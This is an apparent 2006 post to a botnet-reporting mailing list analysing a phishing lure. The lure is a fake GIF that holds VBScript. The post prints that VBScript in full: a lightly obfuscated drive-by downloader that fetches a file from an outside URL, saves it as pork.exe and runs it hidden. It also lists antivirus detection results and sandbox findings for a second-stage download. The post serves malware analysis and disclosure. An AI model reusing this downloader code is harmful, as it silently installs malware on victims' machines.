To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
This one was new to me. A gif that wasn't. Came via email. Link was
tohttp://lulavergonha.rg3.net which framed a gif
(http://mywebpage.netscape.com/lu7y7u/lula.gif) that firefox would
not deal with. DOes explorer reall open these?
Anyway, content of gif had javascript to download the maleware
(beware below is an active link as of this email):
<script language="VBScript">
on error resume next
' due to how ajax works, the file MUST be within the same local domain
dl = "http://mywebpage.netscape.com/lu7y7u/lula.cmd"
' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
' xml ajax req
str6="GET"
x.Open str6, dl, False
x.Send
' Get temp directory and create our destination name
fname1="pork.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
' open adodb stream and write contents of request to file
' like vbs dl exec code
S.write x.responseBody
' Saves it with CreateOverwrite flag
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
[ scan result ]
AntiVir 7.3.0.21/20061229 found [TR/Delphi.Downloader.Gen]
Authentium 4.93.8/20061229 found nothing
Avast 4.7.892.0/20061221 found nothing
AVG 386/20061229 found nothing
BitDefender 7.2/20061229 found [Trojan.Downloader.Banload.MG]
CAT-QuickHeal 8.00/20061229 found nothing
ClamAV devel-20060426/20061229 found nothing
DrWeb 4.33/20061229 found nothing
eSafe 7.0.14.0/20061228 found nothing
eTrust-InoculateIT 23.73.101/20061229 found nothing
eTrust-Vet 30.3.3289/20061229 found nothing
Ewido 4.0/20061229 found [Downloader.Delf.acn]
F-Prot 3.16f/20061229 found nothing
F-Prot4 4.2.1.29/20061229 found nothing
Fortinet 2.82.0.0/20061229 found nothing
Ikarus T3.1.0.27/20061229 found [Trojan-Downloader.Win32.Dadobra.CV]
Kaspersky 4.0.2.24/20061229 found nothing
McAfee 4928/20061228 found nothing
Microsoft 1.1904/20061227 found nothing
NOD32v2 1946/20061229 found [probably a variant of
Win32/TrojanDownloader.Banload.BAY]
Norman 5.80.02/20061229 found [W32/Downloader]
Panda 9.0.0.4/20061228 found [Suspicious file]
Prevx1 V2/20061229 found nothing
Sophos 4.13.0/20061228 found nothing
Sunbelt 2.2.907.0/20061218 found nothing
TheHacker 6.0.3.139/20061229 found nothing
UNA 1.83/20061228 found nothing
VBA32 3.11.1/20061229 found nothing
VirusBuster 4.3.19:9/20061229 found nothing
[ notes ]
norman sandbox: [ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO:
[EMAIL PROTECTED] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH
PASSWORD)**.
* File length: 43520 bytes.
[ Changes to filesystem ]
* Creates file C:\WINDOWS\SYSTEM32\imgrt.scr.
[ Network services ]
* Downloads file from
http://www.aquipodeserbom.xpg.com.br/firma01.bmp as
C:\WINDOWS\SYSTEM32\imgrt.scr.
[ Security issues ]
* Starting downloaded file - potential security problem.
--
Tom Shaw - Chief Engineer, OITC
<[EMAIL PROTECTED]>, http://www.oitc.com/
US Phone Numbers: 321-984-3714, 321-729-6258(fax),
321-258-2475(cell/voice mail,pager)
Text Paging: http://www.oitc.com/Pager/sendmessage.html
AIM/iChat: [EMAIL PROTECTED]
Google Talk: [EMAIL PROTECTED]
skype: trshaw
_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets